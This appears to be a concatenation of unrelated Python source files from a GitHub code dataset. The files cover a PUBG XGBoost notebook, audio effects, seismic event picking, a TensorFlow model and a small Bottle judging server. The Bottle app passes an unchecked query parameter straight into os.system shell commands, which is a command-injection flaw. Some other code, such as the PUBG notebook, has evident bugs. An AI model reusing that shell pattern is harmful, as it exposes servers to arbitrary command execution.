In[8]:\n\n#delete irrelevant columns which won't effect the winning percentage\ndel(train[\"Id\"])\ndel(train[\"groupId\"])\ndel(train[\"matchId\"])\ntrain.shape\n\n\n# In[9]:\n\n\ntrain.head(10)\n\n\n# In[10]:\n\n\ntrain['matchType'].value_counts()\n\n\n# In[11]:\n\n#ecode categorical variable \"matchtype\" into numeric value\nfrom sklearn import preprocessing\nle = preprocessing.LabelEncoder()\nle.fit(train['matchType'])\nle.classes_\n\n\n# In[12]:\n\n\narray =le.transform(train['matchType'])\nprint(array)\n\n\n# In[13]:\n\n\nMatchType = pd.DataFrame(array)\nprint(MatchType)\n\n\n# In[14]:\n\n#delete the old categorical columns and replaced it with encoded column\ndel(train['matchType'])\ntrain.insert(loc=12, column='matchType', value=MatchType)\nprint(train.head(10))\n\n\n# In[15]:\n\n#check if there is missing labled value before start training\ntrain.loc[:,'winPlacePerc'].isnull().sum()\n\n\n\n#create arrays for features to be train and target prediction\nX,y = train.iloc[:,:-1], train.iloc[:,-1]\n\n\n# In[22]:\n\n\n#create the training and test sets\nX_train, X_test, y_train, y_test = train_test_split(X,y,test_size=0.2,random_state=123)\n\n\n# In[23]:\n\n\n#### Model 1: Classification tree with XGBoost\nxg_cl = xgb.XGBClassifier(objective = 'reg:linear', n_estimator=10,seed=123)\n\n\n# In[24]:\n\n\nxg_cl.fit(X_train, y_train)\n\n\n# In[25]:\n\n\npreds = xg_cl.predict(X_test)\n\n\n# In[26]:\n\n#test model quality with accuracy\naccuracy = float(np.sum(preds==y_test))/y_test.shape[0]\nprint(\"accuracy: %f\" %(accuracy))\n\n\n# In[27]:\n\n\n#boosting with CV to select the best model\nPUBG_dmatrix = xgb.DMatrix(data=X, label=y)\nparams = {\"objective\": \"reg:linear\", \"max_depth\" :3}\n\n\n# In[28]:\n\n\ncv_results = xgb.cv(dtrain= PUBG_dmatrix, params=params, nfold=3, num_boost_round =5, metrics=\"error\",as_pandas=True, seed=123)\n\n\n# In[29]:\n\n\nprint(cv_results)\n\n\n# In[30]:\n\n\nprint(((1-cv_results[\"test-error-mean\"]).iloc[-1]))\n\n\n# In[31]:\n\n\n#test model quality with AUC under CV\nfrom sklearn import metrics\n\n\n# In[32]:\n\n\ncv_results = xgb.cv(dtrain=PUBG_dmatrix, params=params, nfold=3, num_boost_round=5,metrics=\"auc\",as_pandas=True,seed=123)\nprint(cv_results)\n\n\n# In[33]:\n\n\nprint((cv_results[\"test-auc-mean\"]).iloc[-1])\n\n\n# In[34]:\n\n\n#### Model 2: Regression tree with XGBoost\nX_train, X_test, y_train, y_test = train_test_split(X,y, test_size=0.2, random_state=123)\n\n\n# In[35]:\n\n\nxg_reg= xgb.XGBRegressor(objective = \"reg:linear\", n_estimators=10, seed=123)\n\n\n# In[36]:\n\n\nxg_reg.fit(X_train, y_train)\n\n\n# In[37]:\n\n\npreds = xg_reg.predict(X_test)\n\n\n# In[38]:\n\n#test model with MSE \nfrom sklearn.metrics import mean_squared_error\nrmse = np.sqrt(mean_squared_error(y_test,preds))\nprint(\"RMSE: %f\" % (rmse))\n\n\n# In[39]:\n\n#### Model 3: Linear Regression\n#Linear Base Learner\nDM_train = xgb.DMatrix(data= X_train, label= y_train)\nDM_test = xgb.DMatrix(data= X_test, label=y_test)\n\nparams = {\"booster\":\"gblinear\", \"objective\":\"reg:linear\"}\n\n\n# In[40]:\n\n\nxg_linear = xgb.train(params=params, dtrain=DM_train, num_boost_round=10)\n\n\n# In[41]:\n\n\npreds = xg_linear.predict(DM_test)\npreds.shape\n\n\n# In[42]:\n\n#test model with MSE\nrmse = np.sqrt(mean_squared_error(y_test, preds))\nprint(\"RMSE: %f\" % (rmse))\n\n\n# In[43]:\n\n\n####Tuning Model with Linear Regression\n\npubg_dmatrix = xgb.DMatrix(data=X, label=y)\n\nparams = {\"objective\":\"reg:linear\", \"max_depth\":4}\n\ncv_results = xgb.cv(dtrain=pubg_dmatrix, params=params, nfold=4, num_boost_round=5, metrics=\"mae\", as_pandas=True, seed=123)\n\nprint(cv_results)\n\n\n# In[44]:\n\n\nprint((cv_results[\"test-mae-mean\"]).tail(1))\n\n\n# In[45]:\n\n\n## Regularization in XGBoosting\n\npubg_dmatrix = xgb.DMatrix(data=X, label=y)\nreg_params = [1,10,100]\n\nparams = {\"objective\":\"reg:linear\", \"max_depth\":3}\n\n#create an empty list for storing rmses as a function of l2 complexity\nrmses_l2 = []\n\n#interate over reg_params\nfor reg in (reg_params):\n params[\"lambda\"] = reg\n cv_results_rmse = xgb.cv(dtrain=pubg_dmatrix, params=params, nfold=4, num_boost_round=5, metrics= \"rmse\",as_pandas=True, seed=123)\n rmses_l2.append(cv_results_rmse[\"test-rmse-mean\"].tail(1).values[0]) \n\nprint(cv_results_rmse)\n\n\n# In[46]:\n\n\nprint(\"Best rmse as a function of l2:\")\nprint(pd.DataFrame(list(zip(reg_params, rmses_l2)), columns=[\"l2\",\"rmse\"]))\n\n\n\n# In[47]:\n\n\n## Tuning with boosting rounds\npubg_dmatrix = xgb.DMatrix(data = X, label = y)\nparams = {\"objective\":\"reg:linear\", \"max_dpeth\":3}\nnum_rounds = [5,10,15]\nfinal_rmse_per_round = []\nfor curr_num_rounds in num_rounds:\n cv_results = xgb.cv(dtrain=pubg_dmatrix, params=params, nfold=3, num_boost_round=curr_num_rounds, metrics=\"rmse\",as_pandas=True, seed=123)\n \n final_rmse_per_round.append(cv_results[\"test-rmse-mean\"].tail().values[-1])\nprint(cv_results)\n\n\n# In[48]:\n\n\nprint(pd.DataFrame(list(zip(num_rounds, final_rmse_per_round)), columns=[\"num-boosting-rounds\",\"rmse\"]))\n\n\n# In[51]:\n\n\n## Auto boosting round selection using early_stopping\npubg_dmatrix = xgb.DMatrix(data=X, label=y)\nparams = {\"objective\":\"reg:linear\", \"max_depth\":4}\ncv_results = xgb.cv(params = params, dtrain=pubg_dmatrix,metrics =\"rmse\", seed=123,num_boost_round = 50, early_stopping_rounds=10) \nprint(cv_results)\n\n\n# In[52]:\n\n\n## Tuning Learning Rate\npubg_dmatrix = xgb.DMatrix(data=X, label=y)\nparams = {\"objective\":\"reg:linear\", \"max_depth\":3}\neta_vals = [0.001,0.01,0.1]\nbest_rmse = []\n\nfor curr_val in eta_vals:\n params[\"eta\"] = curr_val\n \n cv_results = xgb.cv(dtrain=pubg_dmatrix, params=params, nfold=3, num_boost_round=10, early_stopping_rounds=5, metrics=\"rmse\", as_pandas=True, seed=123)\n \n best_rmse.append(cv_results[\"test-rmse-mean\"].tail().values[-1])\n\n\n# In[53]:\n\n\nprint(pd.DataFrame(list(zip(eta_vals, best_rmse)), columns = [\"eta\",\"best_rmse\"]))\n\n\n# In[54]:\n\n\n#### Grid Search with XGBoosting\nfrom sklearn.model_selection import GridSearchCV\npubg_dmatrix = xgb.DMatrix(data=X, label=y)\ngbm_param_grid = {\n 'colsample_bytree': [0.3,0.7,0.9],\n 'n_estomators':[50,100,150,200],\n 'max_depth': [2,5,7],\n \n \n}\n\ngbm = xgb.XGBRegressor()\n\ngrid_mse = GridSearchCV(param_grid = gbm_param_grid, estimator=gbm, scoring = \"neg_mean_squared_error\", cv=4, verbose = 1)\n\n\n# In[55]:\n\n\ngrid_mse.fit(X,y)\n\n\n# In[56]:\n\n\nprint(\"Best parameters found:\", grid_mse.best_params_)\nprint(\"Lowest RMSE found:\", np.sqrt(np.abs(grid_mse.best_score_)))\n\n\n# In[57]:\n\n####RandomizedSearchCV\nfrom sklearn.model_selection import RandomizedSearchCV\ngbm_param_grid = {'n_estimators': [25],\n 'max_depth': range(2,12)\n }\ngbm = xgb.XGBRegressor(n_estimators=10)\n\nrandomized_mse = RandomizedSearchCV(param_distributions = gbm_param_grid,estimator = gbm, scoring = \"neg_mean_squared_error\", n_iter = 5, cv = 4, verbose = 1 )\n\n\n# In[58]:\n\n\nrandomized_mse.fit(X,y)\n\n\n# In[59]:\n\n\nprint(\"Best parameters found:\", randomized_mse.best_params_)\nprint(\"Lowest RMSE found:\", np.sqrt(np.abs(randomized_mse.best_score_)))\n\n\n# In[88]:\n\n####used the model built from GridSearch on test set for prediction\ntest = pd.read_csv(\"../input/test_V2.csv\")\n\n\n# In[89]:\n\n\ntest.shape\n\n\n# In[90]:\n\n\ntest.head(20)\n\n\n# In[94]:\n\n#extract Id columns for future use in submission file\ntest_id = test.loc[:,\"Id\"]\nprint(test_id)\n\n\n# In[75]:\n\n#delete irrelevant categorical columns\ndel(test[\"Id\"])\ndel(test[\"groupId\"])\ndel(test[\"matchId\"])\ntest.head(10)\n\n\n# In[67]:\n\n#encoded \"matchType\" columns with numeric variables\nfrom sklearn import preprocessing\nle = preprocessing.LabelEncoder()\nle.fit(test['matchType'])\nle.classes_\n\n\n# In[68]:\n\n\narray_test =le.transform(test['matchType'])\nprint(array_test)\n\n\n# In[69]:\n\n\nMatchType_1 = pd.DataFrame(array_test)\nprint(MatchType_1)\n\n\n# In[76]:\n\n#replaced the categorical clumn with encoded numeric values\ndel(test['matchType'])\ntest.insert(loc=12, column='matchType', value=MatchType)\nprint(train.head(10))\n\n\n# In[85]:\n\n#applied grid_mse model built for prediction\npred_test = grid_mse.predict(test)\n\n\n# In[86]:\n\n\nprint(pred_test)\n\n\n# In[79]:\n\n\npred_test.shape\n\n\n# In[87]:\n\n\npred_test_df = pd.DataFrame(pred_test, columns = ['winPlacePerc'])\nprint(pred_test_df)\n\n\n# In[95]:\n\n#insert Id column back to the final winPlacePerc prediction\npred_test_df.insert(loc=0, column='Id', value=test_id)\n\n\n# In[96]:\n\n\nprint(pred_test_df)\n\n\n# In[98]:\n\n\npred_test_df.to_csv('pred_test_submittion.csv', index = False)\n\n","repo_name":"sajedjalil/Data-Science-Pipeline-Detector","sub_path":"dataset/pubg-finish-placement-prediction/Jocelyn/pubg-submission.py","file_name":"pubg-submission.py","file_ext":"py","file_size_in_byte":8602,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"16923649504","text":"from __future__ import annotations\n\nimport numbers\nfrom typing import Callable\n\nimport librosa\nimport numpy as np\nimport soxr\nfrom numpy.typing import NDArray\n\nfrom nwave.base import BaseEffect\n\n__all__ = [\"Wrapper\", \"Resample\", \"PadSilence\"]\n\n\nclass Wrapper(BaseEffect):\n def __init__(\n self,\n function: Callable,\n data_arg: str | None = None,\n sr_arg: str | None = None,\n output_sr_override: float | None = None,\n **kwargs,\n ) -> None:\n \"\"\"\n Wrapper for any Callable as an Audio Effect. The function\n must return a NDArray or a 2 length tuple containing a NDArray\n and a float or int as the sample rate.\n\n Args:\n callable: Callable to wrap\n data_arg: Name of the data keyword argument of type NDArray. If\n None, the first positional argument will be used.\n sr_arg: Name of the sample rate keyword argument of type float\n output_sr_override: Define a fixed output expected sample rate\n for cases where only one element of NDArray is returned\n kwargs: Additional keyword arguments to pass to the callable\n \"\"\"\n super().__init__()\n # Check if callable\n if not callable(function):\n raise TypeError(f\"Expected Callable, got {type(function)}\")\n self._function = function\n self._kwargs = kwargs # Store kwargs to pass to function\n self._data_arg = data_arg\n self._sr_arg = sr_arg\n self._output_sr_override = output_sr_override\n\n def apply(self, data: NDArray, sr: float) -> tuple[NDArray, float]:\n # Add the data and sr keyword arguments\n kwargs = self._kwargs\n if self._sr_arg:\n kwargs[self._sr_arg] = sr\n if self._data_arg:\n kwargs[self._data_arg] = data\n result = self._function(**kwargs)\n else:\n # If no data kwarg supplied, add the first positional argument as data\n result = self._function(data, **kwargs)\n\n # For NDArray, return the original sr with it\n if isinstance(result, np.ndarray):\n # If override is defined, return the override\n if self._output_sr_override is not None:\n return result, self._output_sr_override\n return result, sr\n # For 2 length tuple, return the correct ordered result\n elif isinstance(result, tuple) and len(result) == 2:\n if isinstance(result[0], np.ndarray) and isinstance(\n result[1], (int, float)\n ):\n return result[0], float(result[1])\n if isinstance(result[1], np.ndarray) and isinstance(\n result[0], (int, float)\n ):\n return result[1], float(result[0])\n # Otherwise raise an error\n raise TypeError(\n \"Function expected to return NDArray \"\n f\"or tuple containing [NDArray, float], got {type(result).__name__}\"\n )\n\n\nclass Resample(BaseEffect):\n def __init__(self, sample_rate: int, quality: str = \"HQ\") -> None:\n \"\"\"\n Resamples the audio to a new sample rate.\n\n Args:\n sample_rate: Target Sample Rate in Hz.\n quality: Resample Quality (One of 'QQ', 'LQ', 'MQ', 'HQ', 'VHQ')\n \"\"\"\n super().__init__()\n self.sample_rate = sample_rate\n self.quality = quality\n self.qualities = {\"QQ\", \"LQ\", \"MQ\", \"HQ\", \"VHQ\"}\n if not isinstance(self.sample_rate, numbers.Real) or self.sample_rate <= 0:\n raise ValueError(\"Sample rate must be a positive real number.\")\n if self.quality not in self.qualities:\n raise ValueError(\n f\"Invalid quality: {self.quality}. Must be one of {self.qualities}\"\n )\n\n def apply(self, data, sr) -> tuple[NDArray, float]:\n if sr == self.sample_rate:\n return data, sr # Skip processing if already at target sample rate\n return (\n soxr.resample(data, in_rate=sr, out_rate=self.sample_rate),\n self.sample_rate,\n )\n\n\nclass PadSilence(BaseEffect):\n def __init__(self, start: float, end: float) -> None:\n \"\"\"\n Pads the beginning and end of the audio with silence.\n\n Args:\n start: Padding to add to the start of the audio in seconds.\n end: Padding to add to the end of the audio in seconds.\n \"\"\"\n if start < 0 or end < 0:\n raise ValueError(\"Padding must be positive.\")\n super().__init__()\n self.start = start\n self.end = end\n\n def apply(self, data: NDArray, sr: float) -> tuple[NDArray, float]:\n \"\"\"\n Pads a wave array with silence\n\n Args:\n data: Wave array to pad\n sr: Sample rate of the wave array\n\n Returns:\n Tuple of (padded wave array, sample rate)\n \"\"\"\n # Convert from seconds to samples\n pad_s = int(self.start * sr)\n pad_e = int(self.end * sr)\n # Generate zero arrays\n start_samples = np.zeros(pad_s, dtype=np.float32)\n end_samples = np.zeros(pad_e, dtype=np.float32)\n # Concatenate arrays and return\n return np.concatenate((start_samples, data, end_samples), dtype=np.float32), sr\n\n\nclass TimeStretch(BaseEffect):\n def __init__(self, factor: float) -> None:\n \"\"\"\n Time stretches the audio by a factor.\n\n Args:\n factor: Time stretch factor. >1.0 will speed up, <1.0 will slow down.\n \"\"\"\n if factor <= 0:\n raise ValueError(\"Factor must be positive.\")\n super().__init__()\n self.factor = factor\n\n def apply(self, data: NDArray, sr: float) -> tuple[NDArray, float]:\n \"\"\"\n Time stretches a wave array by a factor.\n \"\"\"\n return librosa.effects.time_stretch(data, rate=self.factor), sr\n","repo_name":"ionite34/nwave","sub_path":"src/nwave/effects.py","file_name":"effects.py","file_ext":"py","file_size_in_byte":5908,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"1673278233","text":"#!/usr/bin/env python\n#Disclaimer:\n\n#This software is preliminary or provisional and is subject to revision. It is \n#being provided to meet the need for timely best science. The software has not \n#received final approval by the U.S. Geological Survey (USGS). No warranty, \n#expressed or implied, is made by the USGS or the U.S. Government as to the \n#functionality of the software and related material nor shall the fact of release \n#constitute any such warranty. The software is provided on the condition that \n#neither the USGS nor the U.S. Government shall be held liable for any damages \n#resulting from the authorized or unauthorized use of the software.\n\n\n\nfrom obspy.clients.fdsn import Client\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom obspy.core import UTCDateTime\nfrom obspy.geodetics import gps2dist_azimuth\nimport matplotlib\nfrom obspy.taup import TauPyModel\nfrom scipy import signal as scisig\nfrom matplotlib import cm\n\nimport FilterPicker as fp\n\n# Function to do some plotting of events, the filtered version, and CF's\ndef PlotTn(tr,Tlong,domper,stat,mag,Edist):\n dT=tr.stats.delta\n nTlong=int(min(np.floor(Tlong/dT),np.floor(len(tr.data)-1)))\n N = int(np.ceil(np.log2(domper/dT)))+1\n fig=plt.figure(1,figsize=(12,12))\n t=np.linspace(0, (tr.stats.npts-1)/ tr.stats.sampling_rate,num=tr.stats.npts)-Tlong*2\n plt.subplot(np.floor(N/2.)+2,1,1)\n plt.plot(t,tr,'k')\n plt.ylabel('raw')\n plt.xlim([-10 , 20])\n #for n in range(N):\n n=0\n nn=1\n while n <= N: \n nn=nn+1\n plt.subplot(np.floor(N/2.)+2,1,nn)\n plt.plot(t,fp.DiffFilt(tr,n,Tlong),'k')\n plt.ylabel('T%i=%2.2fs' % (n, (2.**n)*dT) )\n plt.xlim([-10 , 20])\n n=n+2\n plt.xlabel('Time [s]')\n plt.suptitle(stat.code + ' m' + str(mag) + ' dist=' + str(Edist)+'km')\n fig=plt.figure(2,figsize=(12,12))\n plt.subplot(np.floor(N/2.)+3,1,1)\n plt.plot(t,tr,'k')\n plt.ylabel('raw')\n plt.xlim([-10 , 20])\n n=0\n nn=1\n while n <= N: \n nn=nn+1\n plt.subplot(np.floor(N/2.)+3,1,nn)\n plt.plot(t,fp.CreateCF(tr,n,Tlong),'k')\n plt.xlim([-10 , 20])\n ax=plt.gca()\n plt.text(-9,max(ax.get_ylim())*.75,'CF T%i=%2.2fs' % (n, (2.**n)*dT) )\n n=n+2\n plt.subplot(np.floor(N/2.)+3,1,np.floor(N/2.)+3)\n sumCF, CFind = fp.CreateSummaryCF(tr,Tlong,domper)\n plt.plot(t,sumCF,'k')\n plt.xlim([-10 , 20])\n ax=plt.gca()\n plt.text(-9,max(ax.get_ylim())*.75,'Summary CF')\n plt.xlabel('Time [s]')\n plt.suptitle(stat.code + ' m' + str(mag) + ' dist=' + str(Edist)+'km')\n fig=plt.figure(3,figsize=(12,12))\n viridis = cm.get_cmap('viridis', N)\n y = np.append([np.mean(tr.data[1:nTlong])], tr.data)\n yp=[0.]\n for i in range(1,len(tr.data)):\n yp.append(y[i]-y[i-1])\n f1, Pxx1 = scisig.periodogram(yp, 1./dT)\n n=0\n while n <= N: \n f, Pxx = scisig.periodogram(fp.DiffFilt(tr,n,Tlong), 1./dT)\n Pxdiff=10*np.log10(Pxx)-10*np.log10(Pxx1)\n plt.semilogx(1./f, Pxdiff,Color=viridis(1.0*n/N))\n plt.text(50,Pxdiff[1],'T%i=%2.2fs' % (n, (2.**n)*dT), color=viridis(1.0*n/N))\n n=n+2\n plt.xlabel('Period [s]')\n plt.ylabel('dB relative to unfiltered')\n plt.suptitle(stat.code + ' m' + str(mag) + ' dist=' + str(Edist)+'km')\n plt.show()\n\n\n\nmodel = TauPyModel(model=\"iasp91\")\nclient = Client(\"IRIS\")\n\n# stuff to define for the FilterPiker\nTlong=30 # a time averaging scale in seconds\ndomper = 20 # dominant period that you want to pick up to\n\nstarttime = UTCDateTime(\"2018-08-01\")\nendtime = UTCDateTime(\"2019-08-01\")\n# coordinates and radius of study area\nlat=34.9\nlon=-106.5\nrad=1.5 # in degrees\n#max sensor to event distance to analyze\nmax_epi_dist = 250\n#minimum magnitude to analyze\nminmag=2.2\n\nstas= \"*\"\nnets=\"IU\"\nchans=\"HHZ,BHZ\"\n\ndebug = True\n\n# grab some earthquakes\ncat = client.get_events(starttime=starttime, endtime=endtime, minmagnitude=minmag,latitude=lat, longitude=lon, maxradius=rad)\n\n# grab a station list\ninventory = client.get_stations(network=nets,station=stas,channel=chans,starttime=starttime, endtime=endtime, latitude=lat, longitude=lon, maxradius=rad)\nprint(inventory)\n\nfor cnet in inventory:\n for stat in cnet:\n print(stat)\n for evt in cat:\n try:\n tim=evt.origins[0].time\n epi_dist, az, baz = gps2dist_azimuth(evt.origins[0].latitude,evt.origins[0].longitude, stat.latitude, stat.longitude)\n epi_dist = epi_dist / 1000\n arrivals = model.get_travel_times(source_depth_in_km=evt.origins[0].depth / 1000,\n distance_in_degree=epi_dist/111.1949,\n phase_list=[\"p\",\"P\"])\n arrp=arrivals[0]\n arrivals = model.get_travel_times(source_depth_in_km=evt.origins[0].depth / 1000,\n distance_in_degree=epi_dist/111.1949,\n phase_list=[\"s\",\"S\"])\n arrs=arrivals[0]\n print(arrp, arrs)\n if epi_dist <= max_epi_dist: \n st = client.get_waveforms(cnet.code, stat.code, \"*\", chans, tim+arrp.time-Tlong*2, tim+arrs.time+30, attach_response=True)\n print(cnet.code, stat.code, chans, tim, len(st))\n if debug == True:\n PlotTn(st[0],Tlong,domper,stat,evt.magnitudes[0].mag,round(epi_dist))\n except:\n print(\"Could not fetch %s-%s %s\" % (cnet.code, stat.code, tim))\n \n\n","repo_name":"dwilson-usgs/SeismicNetworkDetectionModeling","sub_path":"EventFPickerExample.py","file_name":"EventFPickerExample.py","file_ext":"py","file_size_in_byte":5520,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"11251824792","text":"'''\nClass used for displaying a list of point cloud faces\n'''\nimport open3d as o3d\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport time\n\nclass view_face:\n def __init__(self, faces):\n self.faces = faces\n self.vis = o3d.visualization.Visualizer()\n \n\n def display(self):\n self.vis.create_window()\n\n \n v = self.faces\n for x in v:\n self.vis.clear_geometries()\n pcd = o3d.geometry.PointCloud()\n pcd.points = o3d.utility.Vector3dVector(x)\n self.vis.add_geometry(pcd)\n\n self.vis.update_geometry(pcd)\n self.vis.poll_events()\n self.vis.update_renderer()\n time.sleep(1)\n\n # self.vis.run()\n \n self.vis.destroy_window()\n","repo_name":"Liam-Watson/PCE-GAN","sub_path":"qual_assessment_portal/view_face.py","file_name":"view_face.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"4382640917","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nimport os\nimport random\nimport string\nfrom bottle import *\nfrom bottle import request, route, run, static_file\n\nvalue=None\n\n@route('/')\ndef index():\n return static_file('index.html', './')\n\nsite = '192.68.4.124'\n\nbase_path = os.path.dirname(os.path.realpath(__file__)) # 获取脚本路径\n\nupload_path = os.path.join(base_path, 'upload') # 上传文件目录\nif not os.path.exists(upload_path):\n os.makedirs(upload_path)\n\n\n@route('/', method='GET')\n\n\n#@route('/upload', method='GET')\n#@route('/index.html', method='GET')\n#@route('/upload.html', method='GET')\ndef index():\n return static_file('index.html', './')\n \n \ndef judge(simp_name, problem_id):\n# print('JUDGE ' + simp_name + ' ' + problem_id)\n print('cp ./upload/' + simp_name + '.cpp' + ' ' + './problems/' + problem_id + '/' + simp_name + '.cpp')\n os.system('cp ./upload/' + simp_name + '.cpp' + ' ' + './problems/' + problem_id + '/' + simp_name + '.cpp')\n print('cd ./problems/' + problem_id + ' && syzoj judge ' + simp_name + '.cpp > ' + simp_name + '.txt')\n os.system('cd ./problems/' + problem_id + ' && syzoj judge ' + simp_name + '.cpp > ' + simp_name + '.txt')\n print('rm ./problems/' + problem_id + '/' + simp_name + '.cpp')\n os.system('rm ./problems/' + problem_id + '/' + simp_name + '.cpp')\n print('mv ./problems/' + problem_id + '/' + simp_name + '.txt' + ' ' + './upload/' + simp_name + '.txt')\n os.system('mv ./problems/' + problem_id + '/' + simp_name + '.txt' + ' ' + './upload/' + simp_name + '.txt')\n\n@route('/upload/command')\ndef command():\n\tglobal value \n\tvalue=request.query.value\n\n@route('/upload', method='POST')\ndef do_upload():\n filedata = request.files.get('fileField')\n simp_name = ''.join(random.sample(string.ascii_letters + string.digits, 10))\n save_name = simp_name + '.cpp'\n# print(value)\n if filedata.file:\n file_name = os.path.join(upload_path, save_name)\n try:\n filedata.save(file_name) # 上传文件写入\n except IOError:\n return '上传文件失败'\n print(save_name)\n problem_id = value\n judge(simp_name, problem_id)\n return ' 上传文件成功, 文件名: {}'.format(site + '/upload/' + save_name) + '评测结果:{}'.format(site + '/upload/' + simp_name + '.txt')\n\n## return '上传文件成功, 文件名: {}'.format(file_name)\n else:\n return '上传文件失败'\n\n@route('/upload/')\ndef show_code(file_name):\n print(file_name)\n return static_file(file_name, './upload/')\n\n\n\n \n@error(404)\ndef error404(error):\n return '404 发生页面错误, 未找到内容'\n\n\nrun(host='0.0.0.0', port=80, debug=True)\n\n","repo_name":"AKteamNG/SimOJ","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2806,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"2267014973","text":"import tensorflow as tf\n\nfrom . import util\n\ndef my_estimator(output_dir, throttle_secs, nnsize, batch_size, train_steps, eval_steps, eval_delay_secs, nembeds):\n \n run_config = tf.estimator.RunConfig(save_checkpoints_secs=throttle_secs,\n tf_random_seed=2810,\n keep_checkpoint_max=3)\n \n # Add custom evaluation metric\n def my_rmse(labels, predictions):\n pred_values = tf.squeeze(input=predictions[\"predictions\"], axis=-1)\n return {\"rmse\": tf.compat.v1.metrics.root_mean_squared_error(labels=labels, predictions=pred_values)}\n \n # Feature engineering\n wide, deep = util.get_wide_deep(nembeds)\n \n estimator = tf.estimator.DNNLinearCombinedRegressor(\n model_dir=output_dir,\n linear_feature_columns=wide,\n dnn_feature_columns=deep,\n dnn_hidden_units=nnsize,\n dnn_activation_fn=tf.nn.leaky_relu,\n batch_norm=True,\n dnn_dropout=0.2,\n config=run_config)\n \n estimator = tf.contrib.estimator.add_metrics(estimator=estimator, metric_fn=my_rmse)\n \n train_spec = tf.estimator.TrainSpec(\n input_fn=util.read_dataset('train', tf.estimator.ModeKeys.TRAIN, batch_size),\n max_steps=train_steps)\n \n exporter = tf.estimator.LatestExporter('exporter', serving_input_receiver_fn=util.serving_input_receiver_fn)\n \n eval_spec = tf.estimator.EvalSpec(\n input_fn=util.read_dataset('test', tf.estimator.ModeKeys.EVAL, 2**15),\n steps=eval_steps,\n start_delay_secs=eval_delay_secs, # start evaluating after N seconds\n throttle_secs=throttle_secs, # evaluate every N seconds\n exporters=exporter)\n \n return estimator, train_spec, eval_spec\n ","repo_name":"DivLoic/event-driven-ml","sub_path":"edml-trainer/trainer/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"6749122560","text":"# 1. Предста��лен список чисел. Необходимо вывести элементы исходного списка, значения которых больше предыдущего элемента. Use comprehension.\n# in\n# 9\n\n# out\n# [15, 16, 2, 3, 1, 7, 5, 4, 10]\n# [16, 3, 7, 10]\n\n# in\n# 10\n\n# out\n# [28, 20, 10, 5, 1, 24, 7, 15, 23, 25]\n# [24, 15, 23, 25]\n\nfrom random import sample\n\ndef find_el(num):\n cur_list = sample(range(1, (num+1)*2), k=num)\n print(cur_list)\n\n new_list = [cur_list[i+1] for i in range(num-1) if cur_list[i+1] > cur_list[i]]\n print(new_list)\n\n\n\nfind_el(int(input('Введите количество: ')))","repo_name":"AlbinaKhuade/Python_lessons","sub_path":"Lesson_6/Homework/hw_6-1.py","file_name":"hw_6-1.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72689629922","text":"from data.db_session import global_init, create_session\nfrom data.users import User\n\n\ndef module_1(bd_name):\n global_init(bd_name)\n db_sess = create_session()\n lst = db_sess.query(User).filter(User.address == 'module_1', User.speciality.notlike('%engineer%'),\n User.position.notlike('%engineer%')).all()\n for i in lst:\n print(i.id)\n\n\nmodule_1(input())\n","repo_name":"Ononim03/flask","sub_path":"zaprosy/zapros2.py","file_name":"zapros2.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"36083607595","text":"\nimport sys\nimport serial\n\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\n\nfrom data_handler import data_in\nfrom helpful import int_to_bin_str\nfrom comm_packet import packet\n\nimport time\nimport threading\ndef task1(data_in, num_its):\n\tprint(\"inside 1\")\n\tprint(\"idx: {} num_its: {}\", data_in.data_idx, num_its)\n\n\twhile(data_in.data_idx < num_its):\n\t\tdata_in.read()\n\t\ttime.sleep(0.002)\n\t\tprint(data_in.data_idx)\n\tdata_in.to_csv()\n\tprint(\"wrote to csv\")\n\nclass UI(QWidget):\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\tself.curr_pack = packet()\n\t\tgrid = QGridLayout()\n\t\tself.setLayout(grid)\n\n\t\t#data handler stuff\n\t\tself.data_sock = data_in(0)\n\t\tprint(\"open\")\n\t\tlabel = QLabel(\"Swarm Control GUI\")\n\t\theader = QHBoxLayout()\n\t\theader.addWidget(label)\n\t\tlabel.setAlignment(Qt.AlignCenter)\n\t\tgrid.addLayout(header, 0, 0, 1, 1)\n\n\t\t# self.csv_name = QGroupBox(\"csv name\")\n\n\t\t# grid.addLayout(csv_name_box, 0, 1, 1, 1)\n\n\t\tcmd_group = QGroupBox(\"commands\")\n\t\tcmd_grid = QGridLayout()\n\t\tID_edit = QLineEdit()\n\t\tID_edit.setPlaceholderText(\"Robot ID \")\n\t\tID_edit.returnPressed.connect(self.set_mach_id)\n\t\tcmd_grid.addWidget(ID_edit, 0,0, 1, 2)\n\t\tstart_btn = QPushButton(\"start\",self)\n\t\tstop_btn = QPushButton(\"stop\",self)\n\n\t\tself.enable_btns = [start_btn, stop_btn]\n\t\tstart_btn.clicked[bool].connect(self.enable)\n\t\tstop_btn.clicked[bool].connect(self.enable)\n\n\n\t\tcmd_grid.addWidget(start_btn, 1,0, 1, 1)\n\t\tcmd_grid.addWidget(stop_btn, 1, 1, 1, 1)\n\t\t\n\n\t\tself.ID_edit = ID_edit\n\t\tself.policy_combo_box = QComboBox();\n\t\t# self.policy_combo_box.setPlaceholderText(\"set policy\")\n\t\tfor i in range(pow(2,5)):\n\t\t\tself.policy_combo_box.addItem(int_to_bin_str(i, 5))\n\t\tcmd_grid.addWidget(self.policy_combo_box,2, 0, 1, 